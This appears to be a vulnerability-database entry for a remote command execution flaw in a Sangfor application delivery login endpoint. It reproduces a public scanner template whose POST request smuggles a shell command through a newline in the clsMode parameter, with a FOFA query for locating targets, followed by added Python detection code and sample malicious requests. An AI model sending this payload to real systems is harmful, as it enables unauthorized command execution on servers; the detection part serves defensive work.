sangfor-login-rce: Sangfor Application Login - Remote Command Execution

Date: 2025-08-01 | Affected software: Sangfor Application Login | PoC: public

Vulnerability description

The login endpoint of the Sangfor application delivery management system has a remote command execution vulnerability, through which an attacker can obtain server privileges and execute arbitrary commands.

PoC code [public]

id: sangfor-login-rce

info:
  name: Sangfor Application Login - Remote Command Execution
  author: SleepingBag945
  severity: critical
  description: |
    Sangfor application delivery management system login has a remote command execution vulnerability, through which an attacker can obtain server privileges and execute arbitrary commands
  reference:
    - https://github.com/zan8in/afrog/blob/main/v2/pocs/afrog-pocs/vulnerability/sangfor-login-rce.yaml
  metadata:
    verified: true
    max-request: 1
    fofa-query: fid="iaytNA57019/kADk8Nev7g=="
  tags: sangfor,rce,vuln

http:
  - raw:
      - |
        POST /rep/login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&loginType=account&page=login&rnd=0&userID=admin&userPsw=123

    matchers:
      - type: dsl
        dsl:
          - status_code == 200
          - regex("uid=([0-9(a-z)]+) gid=([0-9(a-z)]+) groups=([0-9(a-z)]+)", body)
          - contains(body, "cluster_mode_others")
        condition: and
# digest: 4a0a00473045022100aaa336e5a0256947d273487d84028e98a558060a787906427d29010c3117e621022038443a491101f6b99eb53fc93fbffb04d7b869e85d1be44e92f336df0f4ac435:922c64590222798bb761d5b6d8e72950
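
Detection side of the template above, as an added example that is not part of the original page or of the template author's code: it flags POST requests to /rep/login whose clsMode parameter decodes to anything other than a plain identifier, which is how the templated request differs from a normal login. The function names, the sample requests and the rule that a legitimate clsMode is a plain identifier are assumptions made for this example.

```python
import re
from urllib.parse import parse_qsl

# Assumption: a legitimate clsMode value is a plain identifier such as
# "cls_mode_login" (the prefix seen in the template's request body).
SAFE_VALUE = re.compile(r"[A-Za-z0-9_]+")
WATCHED_PATH = "/rep/login"
WATCHED_PARAM = "clsMode"


def suspicious_cls_mode(method, path, body):
    """Return the reasons a request looks like the templated probe, or []."""
    if method.upper() != "POST" or path.split("?", 1)[0] != WATCHED_PATH:
        return []
    reasons = []
    # parse_qsl URL-decodes once, so %0A in the raw body becomes "\n" here.
    for name, value in parse_qsl(body, keep_blank_values=True):
        if name != WATCHED_PARAM:
            continue
        if any(ch in value for ch in "\r\n"):
            reasons.append("line break inside clsMode")
        elif re.search(r"%0[ad]", value, re.IGNORECASE):
            reasons.append("double-encoded line break inside clsMode")
        elif not SAFE_VALUE.fullmatch(value):
            reasons.append("clsMode is not a plain identifier")
    return reasons


# Constructed sample requests (method, path, form body) for illustration.
SAMPLES = [
    ("POST", "/rep/login",
     "clsMode=cls_mode_login&index=index&loginType=account&userID=admin&userPsw=x"),
    ("POST", "/rep/login",
     "clsMode=cls_mode_login%0Aid%0A&index=index&log_type=report&page=login"),
    ("POST", "/rep/login", "clsMode=cls_mode_login%250Aid&page=login"),
    ("GET", "/rep/login", "clsMode=cls_mode_login%0Aid"),
]


def scan(samples):
    """Return (index, reasons) for every sample that is flagged."""
    return [(i, r) for i, s in enumerate(samples) if (r := suspicious_cls_mode(*s))]


if __name__ == "__main__":
    for idx, reasons in scan(SAMPLES):
        print(idx, reasons)
```

The same predicate can be applied at a reverse proxy or WAF that sees request bodies; ordinary access logs usually omit POST bodies and will not show the parameter.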
